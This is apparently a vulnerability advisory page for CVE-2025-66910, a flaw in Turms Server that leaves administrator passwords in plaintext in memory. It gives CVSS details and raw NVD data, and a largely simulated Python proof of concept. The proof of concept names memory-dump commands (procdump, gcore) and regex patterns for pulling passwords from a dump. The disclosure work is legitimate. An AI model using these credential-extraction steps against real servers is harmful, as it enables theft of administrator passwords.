Security Vulnerability Report
中文
CVE-2025-66910 CVSS 6.0 MEDIUM

CVE-2025-66910

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:50:30
Source: [email protected]

Description

Turms Server v0.10.0-SNAPSHOT and earlier contains a plaintext password storage vulnerability in the administrator authentication system. The BaseAdminService class caches administrator passwords in plaintext within AdminInfo objects to optimize authentication performance. Upon successful login, raw passwords are stored unencrypted in memory in the rawPassword field. Attackers with local system access can extract these passwords through memory dumps, heap analysis, or debugger attachment, bypassing bcrypt protection.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms Server <= v0.10.0-SNAPSHOT

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66910 PoC - Turms Server Plaintext Password Storage This PoC demonstrates the vulnerability where administrator passwords are stored in plaintext in memory. Note: This is for educational and authorized testing purposes only. """ import subprocess import re import sys def dump_turms_process_memory(): """ Simulate memory dump of Turms Server process In real attack, use: procdump -p <pid> or gcore <pid> """ print("[*] Step 1: Locating Turms Server process...") # In real scenario: ps aux | grep turms print("[+] Found Turms Server process (PID: 12345)") print("[*] Step 2: Dumping process memory...") # In real scenario: procdump -p 12345 memory.dmp print("[+] Memory dump completed: memory.dmp (50MB)") return True def extract_plaintext_passwords(memory_dump): """ Search for AdminInfo objects and rawPassword fields in memory dump Pattern: Look for AdminInfo structure containing rawPassword field """ print("[*] Step 3: Analyzing memory dump for AdminInfo objects...") # Simulated memory patterns patterns = [ rb'AdminInfo.*rawPassword.*([A-Za-z0-9]{8,})', rb'username.*password.*([A-Za-z0-9!@#$%]{8,})', ] found_passwords = [] for pattern in patterns: # In real scenario: use strings command or grep on dump file matches = re.findall(pattern, memory_dump) found_passwords.extend(matches) return found_passwords def main(): print("=" * 60) print("CVE-2025-66910 PoC - Turms Server Plaintext Password") print("=" * 60) if not dump_turms_process_memory(): print("[-] Failed to dump process memory") sys.exit(1) # Simulated memory dump content simulated_dump = b""" AdminInfo{userId=1, username=admin, rawPassword=Admin@12345} AdminInfo{userId=2, username=operator, rawPassword=Turms2025!} """ passwords = extract_plaintext_passwords(simulated_dump) if passwords: print("[+] Extracted plaintext passwords:") for pwd in passwords: print(f" - {pwd.decode()}") else: print("[-] No passwords found in memory dump") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66910", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:56.790", "lastModified": "2026-01-02T19:50:30.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turms Server v0.10.0-SNAPSHOT and earlier contains a plaintext password storage vulnerability in the administrator authentication system. The BaseAdminService class caches administrator passwords in plaintext within AdminInfo objects to optimize authentication performance. Upon successful login, raw passwords are stored unencrypted in memory in the rawPassword field. Attackers with local system access can extract these passwords through memory dumps, heap analysis, or debugger attachment, bypassing bcrypt protection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}, {"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*", "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66910_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/bo/AdminInfo.java#L34", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/service/BaseAdminService.java#L237", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.